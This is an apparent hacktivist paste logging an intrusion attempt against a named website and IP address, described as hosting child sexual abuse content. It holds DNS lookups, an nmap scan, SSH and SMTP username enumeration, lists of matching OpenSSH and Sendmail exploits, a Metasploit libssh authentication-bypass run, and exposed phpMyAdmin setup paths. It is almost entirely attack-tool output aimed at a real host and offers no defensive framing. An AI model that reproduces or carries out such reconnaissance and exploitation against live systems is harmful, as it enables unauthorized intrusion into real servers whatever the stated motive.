Childporn WebSite Hacked #DEDSQUAD


SUBMITTED BY: GhostGrim

DATE: Feb. 26, 2020, 3:37 p.m.

FORMAT: Text only

SIZE: 3.3 kB

HITS: 1130

  1. Host's addresses:
  2. __________________
  3. teenxporn.xxxtop.biz. 86384 IN A 162.244.35.13
  4. Wildcard detection using: rcvvjvlulnns
  5. _______________________________________
  6. rcvvjvlulnns.teenxporn.xxxtop.biz. 86400 IN A 162.244.35.13
  7. ======================================================================================
  8. Nmap scan report for teenxporn.xxxtop.biz (162.244.35.13)
  9. Host is up (0.27s latency).
  10. rDNS record for 162.244.35.13: xnlog.com
  11. Not shown: 990 closed ports
  12. PORT STATE SERVICE VERSION
  13. 19/tcp filtered chargen
  14. 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
  15. 25/tcp open smtp Sendmail 8.15.2/8.15.2
  16. 53/tcp open domain ISC BIND 9.10.6
  17. 80/tcp open http nginx
  18. 111/tcp filtered rpcbind
  19. 135/tcp filtered msrpc
  20. 139/tcp filtered netbios-ssn
  21. 222/tcp open ssh OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
  22. 587/tcp open smtp Sendmail 8.15.2/8.15.2
  23. Service Info: Host: DS791847.clientshostname.com; OSs: FreeBSD, Unix; CPE: cpe:/o:freebsd:freebsd
  24. port 22 (SSH) VULNERABLE AS FUCK
  25. [+] 162.244.35.13:22 - SSH - User 'mysql' found
  26. [+] 162.244.35.13:22 - SSH - User 'nobody' found
  27. [+] 162.244.35.13:22 - SSH - User 'root' found
  28. [+] 162.244.35.13:22 - SSH - User 'user' found
  29. OpenSSH 7.2 - Denial of Service | exploits/linux/dos/40888.py
  30. OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | exploits/multiple/remote/39569.py
  31. OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
  32. OpenSSHd 7.2p2 - Username Enumeration | exploits/linux/remote/40113.txt
  33. CVE-2016-8858 7.8 https://vulners.com/cve/CVE-2016-8858
  34. RUNNING LIBSSH AUTH BYPASS EXPLOIT CVE-2018-10933
  35. ====================================================================================•x[2020-02-24](15:58)x•
  36. RHOSTS => teenxporn.xxxtop.biz
  37. RHOST => teenxporn.xxxtop.biz
  38. LHOST => 127.0.0.1
  39. LPORT => 4444
  40. [*] 162.244.35.13:22 - Attempting authentication bypass
  41. [*] Scanned 1 of 1 hosts (100% complete)
  42. [*] Auxiliary module execution completed
  43. (this worked means we can bypass the authentication)
  44. PORT 25 (smtp) VUln
  45. 162.244.35.13:25 - 162.244.35.13:25 Users found: bin, daemon, ftp, games, man, news, nobody, operator, postmaster, proxy, sshd, user, uucp, www
  46. HPMailer Sendmail Argument Injection
  47. /usr/share/findsploit/msf_search/exploits: 685 solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution
  48. /usr/share/findsploit/msf_search/exploits: 732 unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape
  49. (can reset server and mailing)
  50. PhpMyAdmin Setup Page:
  51. http://162.244.35.13/phpmyadmin/setup/index.php
  52. phpMyAdmin readme :
  53. http://162.244.35.13/phpmyadmin/README
  54. #DEDSQUAD
  55. #GHOSTSEC

comments powered by Disqus